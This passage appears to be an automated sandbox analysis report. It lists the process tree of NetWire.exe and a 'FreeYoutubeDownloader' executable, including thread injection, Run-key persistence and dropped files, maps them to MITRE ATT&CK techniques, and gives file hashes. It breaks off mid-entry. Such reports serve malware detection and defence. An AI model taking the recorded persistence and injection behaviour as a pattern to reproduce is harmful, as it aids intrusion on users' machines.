- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6523419352115598076,14850998126787351190,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7548 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:8592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:864

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5136

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3dc 0x4e8
1⤵
PID:5720

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7148

C:\Users\Admin\Downloads\NetWire.exe
"C:\Users\Admin\Downloads\NetWire.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7560
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:8232
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    PID:9020

C:\Users\Admin\Downloads\NetWire.exe
"C:\Users\Admin\Downloads\NetWire.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9320
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:7740
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    PID:6952

C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe
"C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7832
- C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
  "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
  2⤵
  - Executes dropped EXE
  PID:2252

C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe
"C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7128
- C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
  "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
  2⤵
  - Executes dropped EXE
  PID:7636

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"
1⤵
- Enumerates connected drives
PID:9512

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
PID:9212
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 79DD1F007D1CD38C40C4271F7035785D C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:8240

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
1⤵
- Executes dropped EXE
PID:4620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
14dcb0757992b77ca509df0c81c7bd69

SHA1
a2e3150570ec2c97419f66f9520437889a127ded

SHA256
965afa393f1f834be6394df9a6fbbb262cf9df2acbc5ce15c7cd491e6b9dee46

SHA512
876e6d7de21777fff3e05caf31ae99078b5f5f53beeaff34c1b7075efdc5435179230054a10b7a3966f0da61d159757351ef3dd1096f4878f4c4f47d482479d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
212KB

MD5
08ec57068db9971e917b9046f90d0e49

SHA1
28b80d73a861f88735d89e301fa98f2ae502e94b

SHA256
7a68efe41e5d8408eed6e9d91a7b7b965a3062e4e28eeffeefb8cdba6391f4d1

SHA512
b154142173145122bc49ddd7f9530149100f6f3c5fd2f2e7503b13f7b160147b8b876344f6faae5e8616208c51311633df4c578802ac5d34c005bb154e9057cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
6840b8b472561963dd5ce50718c42bb2

SHA1
5312d6c0924bc861e7cdc9262277aa9fbe50f173

SHA256
5994012940367cc192ed33385dfca1bc1bc63ca3f04e31fee349209dcab6f4ce

SHA512
2f75daf47d7624d03c680f704ed0d4b5f10330d4daea49e119e1d919a4a30a52368580a8b5620cdffa49eab4ddb2546f52281c78cbc72656882eb323c81353e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
b539747e3ddef7939eaa38e686bd9ff2

SHA1
8bd655c40d15bf3262b664110240937cf1d3e52d

SHA256
345835a63cb7ed3c3a331f674f4563c7e6a3682ac45cf41328ec3f0442622279

SHA512
04b2a127df1d0d809f692db50dbfc2b0f1d6b43e3cbe9e70b1f075f09e3002edee10a720f6e0e2113d6e719f964785d4e52df325c37bb1468010f05c786b39f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
f1c0577156471a8eaf0328a09489801f

SHA1
6dc5d5ff918b118d75eef7fcbc907866d4201114

SHA256
db68c79748b85723480b29e1e9edd61a646f499e4bfbc9298aa3c78a945d79b2

SHA512
fc6917e6ec8439f93c6e100e0aff1780b56d22ce6f5d89282d8ebbc023cb76a8c7db69d716dc7dd36e26b8854b228176feb58d763d2b5021263ede6096ca1df8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
8cda2975e4e7421a46b3a39894f56ede

SHA1
d92c0e29655b85807f6a26f913f770581f486ae1

SHA256
a3c268ce5d01eb2a5925e3f88d22b91cc94512d306dcefd15b611b97c949e0a1

SHA512
6f1d0e0ffc560a3ace6b7813aa1c39937aec55fb59bb0e031c54243d00237d4d2adc3ef5289298aae10fede8aea833617d6fda323b9983d101f187d698f6443a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
bafcf1259af2d4eebb5a2980a7dc7a10

SHA1
e09a245734a7594e81165491fb7b8f555f27ea5f

SHA256
8102fcd83e079818aec837f35a6d8229386f2f6764b201c827890d316455782d

SHA512
24ee62a820dc56b92df244bb20e67d2a886c23dcdb0e185ae6aca8dae58766df55cd0b4f62cace1cf11a2812896d2dc0261f5f000b8a45c47cdaba9b9c0b4b76

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
29e0a661519d69560a59647f986a1f3c

SHA1
a35d38cab677b41a00179187f91fd7ce62baab33

SHA256
5dffd88abc9efecbea9eae5f7aefb5b15bd82abe52c01b825a0408a807f8a61b

SHA512
1210d6d4b3cf1fe0621bac2471b58de0ec8bf1d56f41a9b1cec81b2bb78d9655706b6041c8736625547ca68d1c83e568809d4b092c1c00b8055bedaa9601b3f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ca331dcafa7c88336e7cdc8c79781a5d

SHA1
44e579dc288f88a6081a831d5636b2012bb82f49

SHA256
77624e916c10e52e25e72b2e60cb84352b026cdc544a5df1ae5fcb8ddf35e3f4

SHA512
ee0155b023b68ce217f5898c1ccbf3729e407475239610bf7d4658190e665b9d2c37553f2039d6788c4bf6412bd017a588ea90944076dfcc594c98d1fd1e47dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4334848e6eba8013d6afc3d06f9146b3

SHA1
ac959176217ae7d3399a4e2d0163cadcd8fb3af2

SHA256
3a4e94fd8561b711c2b9932533c55178c4b2463c52c6ca8f95d625eb0dfddfca

SHA512
cc0e0086c241e737e28bb7318ab9fd2a8f344dfcb1af32534eb7fe774a79035cfe7597d87adb8e714275c5d920a705ad07ad4f817a634b5e46824bd49ac44e97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
61a144641776b89ad6147eaf678f1e93

SHA1
f1a8aa86b5f11330c3455bac91e3851d768a4819

SHA256
3c662406bf5e3067076e002bb54f91df15e9ffaf07d97b05c32f960bef6e5fe6

SHA512
fa76d7a01ef64fb55e0a2f935991c74e72a80bb2cb8d5c84ef49920838499056ac385948c5b4c34d806da0a163045383aa286b6f390cbc8453de322e9cda8dc7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
208KB

MD5
56b8f84c783a796621826fd0554a73a8

SHA1
bc1335bf2dfc5c5c860420fb8466dcde84790c8e

SHA256
801a34e23d2fc7bb120b39f710b5c85c7095bcf2a5ac6da57ac2710f97868767

SHA512
d59337ce56b409dc205b34158b7cd86e34469533dd4e72bed5dc26513a35ee56ae116bf5f85a0dbe62e6b5685aa48c62d2d20ecdc29e09a02c24697c388e7104

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
208KB

MD5
1af00c19799eec883782596be7d28e91

SHA1
9453d8c6b0413819b69e0d9b8979725c5334e4f5

SHA256
afd5a2dddc8365444c5dfd1dd6e378e966e6c2366eca8f8312486f54ac927458

SHA512
84a0177dab1292e936892a3f7927834afab75a6d0009f5afc2b1942d3ada1cb2a5f2730f2ee90ac19fe581226af358844ca8f00c46fe4a883c4d2ea81ef5842f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
208KB

MD5
bd549460fd77026af288c739ddffb927

SHA1
56efd788f62e51d5496d9502a760deea52032c3a

SHA256
e33ad776370352e84c5516fecf0159f386962c5402ed4ad52dd6516b441474f1

SHA512
79f8bced1ed569a2773a4bee4b96337e5097063f5d35c4458ec95da33dc4009ccd86267921cc6d5ee9380add5ed276343b72a1a296a9418b8234b7cfd03202b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ab8ce148cb7d44f709fb1c460d03e1b0

SHA1
44d15744015155f3e74580c93317e12d2cc0f859

SHA256
014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff

SHA512
f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
38f59a47b777f2fc52088e96ffb2baaf

SHA1
267224482588b41a96d813f6d9e9d924867062db

SHA256
13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b

SHA512
4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2186298377c109202a764740d8ae7504

SHA1
b032b2dd2609f55b90039d517bd59d37f402855f

SHA256
107581a09d7c4427192c54ab8fdc19f947e7f3963973526d36f8a825b6425e0b

SHA512
2740d235679bee4bd73b55463f1b99ec15c2d58cbc17b901b355eef9c159191fe9fee5ae24b2f86ec6f135e1ba27f3481ac94738fd1b1b7d921a7d9e813fc9a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
518bf170cab71fa11f26edfa6d53a6c7

SHA1
0dd6d37253bc50304c9e398778da1120af9f5046

SHA256
84f6ec6da93d6cadbf58e41e4a0c0235d757aa9d88757570e46ef7ac5ffd7a3b

SHA512
cf6bef3e7305f6a7e24a45b378f94a79f71d5ed858990a7d951717d08f4f6e707aefd5d4c8ce891c6096a495c1ed79056f72ecc20ece96ed8893d3b0e15f3d10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
6ea969bc849e58dd3725060872b6b151

SHA1
b867e0067a6bf2efaf3affa5882bee12e48fc161

SHA256
01ff57acfd5b8a0c5a63937fc9d04835efbb1cf7d04c3d4dd273a725c75763df

SHA512
16995118e2093e58d55674982bb5d42bc4db341e672825c688eea2f2657e15f11ebc47725369ed12f80eb0cd84d02bf51ab777e0586cdb8ae081bbf3cedad7c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
99217d636f122a289632f221c0c93311

SHA1
d92f4b27b831a9ffdffb0e7d4d53debe5e67599e

SHA256
fff9aff705b335554e3a191251a4c88a5aecbdc82ef768e9652188f2786f8246

SHA512
6ed59d8077ae824daef0a0d2cb9025a83b0f390e99133c63b19b8041af4e417eaed1162b3e60b7d362ae51a099d57bde4046a847ee54de34e4b02abc21658521

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
38ae07dc3ed440a9aa2fb2de02b992a0

SHA1
7a177e30a57ab065f3d14881d5662fe5db67fec2

SHA256
5c8bd4d24cb1df5160b764e0735514716ee7cff6468b02febbfe9040c7e46d6e

SHA512
3b324ba2b7500ac2851fe2b7bb75a6b9024c4a9d4f3ef296c399c809149bba134ae74b16935e083115f260fbbce8d472a35131c6c71a6c7b479d2e591ff5e622

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
b881e31f59d905325ae8feed402e1db1

SHA1
50b7b8d3bdbcf670b83f4b2faeac05ff491de7a7

SHA256
975f166c8bf8485a3d8d9a5b0b0cd354e7fd7e643275a706fd4366d70f76ea27

SHA512
7978799c01008386a1a4cfb8d531d3209dd89931621e521765929753b3a461424df2da1049f7f44cda4169b32775613179142d49f54e81257eef5fbba060dbea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
67KB

MD5
929b1f88aa0b766609e4ca5b9770dc24

SHA1
c1f16f77e4f4aecc80dadd25ea15ed10936cc901

SHA256
965eaf004d31e79f7849b404d0b8827323f9fe75b05fe73b1226ccc4deea4074

SHA512
fe8d6b94d537ee9cae30de946886bf7893d3755c37dd1662baf1f61e04f47fa66e070210c990c4a956bde70380b7ce11c05ad39f9cbd3ea55b129bb1f573fa07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
43KB

MD5
9ba5734d1a7f2decf2c850d09b7ffa31

SHA1
b5088aec3c6626fcb7e4e0ff6ce3c2f595391ba8

SHA256
41a8f15b95278fde92e7fa87bbf18154a747d6f6dc9b95266f2f4e1defd3f836

SHA512
09752603746457d797647cb3bc0ae62b69d24c3cda90a2e958d9cb4d05af2eaf98d4223573ed80ea3bccf039aba5961111ecd34cb0e4697581faa671cb9d9c1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

Filesize
1.2MB

MD5
49603555d1435a91f7270513bc5b6dc0

SHA1
36d4ff7a92b94257c6f099c3c9e7fc583cd0e938

SHA256
999c1c8c2b4c18eb0ef46792d188ef064ad6c8cf4cacf7f8005fb0c7c01d05f7

SHA512
f3856d525b0c749392f5d08d4c06a9a1db5755b4a31097db274bb08b3365bd9215f6c716f18a72c246671836c00c2af4fe06ee61b63adf5571f334beb256691b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049

Filesize
64KB

MD5
09e30ec0ae2a2effc2b6872b0af0aae9

SHA1
b0237ba13c5160a1bdca9c048c78132f1afffc27

SHA256
4fc13a7ed321277251af657b0d604a5c39ded056cd19a14c214473c8a7f1901d

SHA512
f7e7ecb843fdefe4e43e7a436ef0f433cdb82d4a0e1558eebb70c4281bd5fbc242bb3bd87d8c6e3ef09a01d9b54a0b7c5883691e316895e45c5bdb0232429012

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c

Filesize
20KB

MD5
5f747c64539885d991db99de756ce1cd

SHA1
a767f8dcef5742cad81e949f0ea5eb91ef0dbb55

SHA256
85ba8c5dfb41e7d6b7dbef0f0a180b487b7d600af5eec1d2c6017fe231b43abd

SHA512
1470b4b0272c7d5d3e8ed144ef1d2a2d9e3a89c99c9ad76a3eda2259ec5e84db693e447b555d9849b89fd507ae5050a461cf02ea70daf993aa74b4a1bd141bef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000ae

Filesize
28KB

MD5
8b4eef92298453e0536f38127ed3dd35

SHA1
e778ceb9964d0035f688bb1d8c3c30b36e90e261

SHA256
2f6d9e04250c84e0541a29cb66bc978dc128edc99e187d4a2642fc64fb1050e4

SHA512
a6c767367f131f93c07e2017809626642eb929139aad245447527ce28d23cfc83011c4258497d1e969851e1942dc01cbefe84d3f229318e668804d7243568f36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000af

Filesize
22KB

MD5
66564a1254c426b0e6af93895eaed40f

SHA1
7005542e9ce912c95b37e798e3877bdff0ff22f7

SHA256
f09a7923d754edd591da65464e386e2d05755f6691dd757d548346adf14d4ea2

SHA512
0698f3067f289d646d5dba027d987376784fe2cfde1e38d8ca340c31d533d025c367fff5f1afb9a98c2be25443987ed008fe306a947fa7b35b41db38e93f4459

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000b0

Filesize
131KB

MD5
659b829946b7a38195fee14d9bb3adac

SHA1
09108db991ce79d7b0f7069d41861975de63740b

SHA256
4acccb191f8a82f76f2d83ae05eff9f49030697c9bcf076793d2b0feda1c5146

SHA512
348e7b73d29749069a86f803f8f5eb20dea65187ed4de0431e9e84bfaaa1072e5ec07b70f0c390f732fdd1a51affb47f7e446ce86e340cafdf39da58fa52e251

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000b2

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000b5

Filesize
18KB

MD5
8eff0b8045fd1959e117f85654ae7770

SHA1
227fee13ceb7c410b5c0bb8000258b6643cb6255

SHA256
89978e658e840b927dddb5cb3a835c7d8526ece79933bd9f3096b301fe1a8571

SHA512
2e4fb65caab06f02e341e9ba4fb217d682338881daba3518a0df8df724e0496e1af613db8e2f65b42b9e82703ba58916b5f5abb68c807c78a88577030a6c2058

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000f2

Filesize
1.2MB

MD5
7621f79a7f66c25ad6c636d5248abeb9

SHA1
98304e41f82c3aee82213a286abdee9abf79bcce

SHA256
086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d

SHA512
59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
7KB

MD5
153cc49ac62b6bb3b9fc1c75090387d8

SHA1
868b333fa7a6f9d48be6d29dbfc6132417778824

SHA256
a951a0a1c71f8130c42ba7b0f6f6516a6bd56c620a2dcf4b01bf2467e4003380

SHA512
4cee2d0c1bc98ca2e185be855fe4fc5d7ad851eda3bcef7ac9a2c6b5062c607727897f69f225f7763d3832de1451e9753f773c53bb00b24e127b68cef237d771

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
a7337da90a8ef3dfb9a233cbf29bcb34

SHA1
0cd79ab665e99870d4e4786df27af7f404e7cacc

SHA256
378f4536c9adbbaf9c02ccaea88e389e1773faa3144c6c473ff4baae0391b32a

SHA512
e30b3c837524d51b115ba15dffa47cb8c2033c15ff9d3dbc4f4caccc1c6ea071ffaee28758e49cb31d127d1ae47a803f7bf945ef104165d0ec176b0afcbc2671

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
10KB

MD5
98277209d773e844cff26008ceceae03

SHA1
048cc482e3205f3a2afd7dd201cc3e5a597bd076

SHA256
27158551646a27394a3e9f913125921a81ebd58126eb553f9fcfc39a87dc294e

SHA512
8aea00d78362b5dd192db951e70765675f37ed1c9b23b6405e97e5434fe76e5cfe02568ab16c68201058e68001dca5f21fe9247df06990be3a3cf04f7b0687e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
11KB

MD5
efbd27c243660fa852835d1c50122313

SHA1
e7983492f7a3bb3b8df96a77be051c9b44d74883

SHA256
493663c538e79a5f7d54f1f9afc7fb39f17ab4177ed9e0a7ac04af87e9072e9b

SHA512
7b52df0b19084cca011b610269f48f2c232fc37d4a3241ed772077019528de07e0394ee302477f3467d354eacf3f9c90759c2ec0e3688cf5149a7d4a1251a27b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
4b7fb845996f96e7ec4f739c8487c994

SHA1
83a187fbc8262210899a6c4b56f0dca9ec551a58

SHA256
e975fc56e2db510307270e31c5b3b9bc567f20cbce1956c370eadd0a82a14378

SHA512
1b36537693050f124b3c174458df5d5224ebc1f839dffffc592e9fdb469957b1be9af145914c3cc80f14f50b7916ef3bf86897182484bbe83e5006c001d2dc36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
322B

MD5
7d6f28c66e8168291819684d0bd222d2

SHA1
91f53e6c24bbf6226b23f6be01666e2e135d5c0c

SHA256
6bdb363fd74556992d5a6fdcddd1fe357441b093a5a33f90e670104068d8f6da

SHA512
40e2f47e510109d238988bda40c344410a5879484c8651a392b6d646ff89fbbf2ff4fc953e99f6879786df86b473a6d996cbec3bfd7fddfdcc339d285c21ac0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\00\00000000

Filesize
1.9MB

MD5
ed6c1595b3f91f4c126da91cfc8e1975

SHA1
d294c6cd37340d4f56dabc480b7973eaaae3e560

SHA256
5bd58d994a5b3dd7695ae2c66d2a483eb18ffc6cb50d75a8cec29dc47425c4e0

SHA512
fdcdecd92b5a102eb3fcdbe702ccc21ef3aa963cd2653bae11ea658b7a2e21bccb57c78aacd0c5bdbfa8f1507bfb70f0e66c5adaadf17248eebcd41989b53999

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
d2f0d1480b5e3fa960e077f1677fb965

SHA1
b63c14f0f75be182d99528be9c7101df82a504d9

SHA256
0142a7704f26a3fd01be8ead7405952df492d01f76fe93323f757591f739390f

SHA512
39970dd1a4e4c59344e5886a228b661e6a6c5b9f601aad34ebd81bd0a52cf04a561fcb3365240e0cc2acc87369ea3dcec8776031d6f097750a0c10f52db8b1ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
514B

MD5
757bdbb6173738b369280114bda903db

SHA1
776887bffeeb950b05880ce495db218896d4a720

SHA256
eb2795044b5ca99589d99304054745ea069c3fabbea72d4ef9b141328d3a4819

SHA512
1efb0f1fe001bc5d9badca3a4da7c65b5afa1a8de6aceccb40a5b455a4a42b351d59cb239e89413ffe88468426f25b67fda7d1f815126f7e467b4e4b6c912059

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Filesize
44KB

MD5
c8e5f1bba4327281ee847ad4627f7439

SHA1
f7bdee8a507b6e8a549c05b2dc067308b457d29b

SHA256
b323c38971b2ee5d85391afd342332977fdb69b92940c8305de99bcf437a4012

SHA512
655725434d76010233a21d0561d5d20f54279a95550c2b5fcf2a9028efd7bd0aeff0e347afbb4fb0fcdf3e8e8da1f4d6805b92c8d33917642dcf4e79cbe1ed1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
